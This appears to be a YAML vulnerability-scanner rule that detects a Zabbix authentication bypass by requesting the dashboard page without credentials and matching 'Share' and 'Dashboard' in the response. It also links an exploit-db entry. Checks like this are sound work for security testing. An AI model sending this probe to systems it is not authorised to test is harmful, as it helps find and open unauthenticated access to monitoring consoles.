name: poc-yaml-zabbix-authentication-bypass
rules:
- method: GET
path: /zabbix.php?action=dashboard.view&dashboardid=1
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes("Share")) && response.body.bcontains(b"Dashboard")
detail:
author: FiveAourThe(https://github.com/FiveAourThe)
links:
- https://www.exploit-db.com/exploits/47467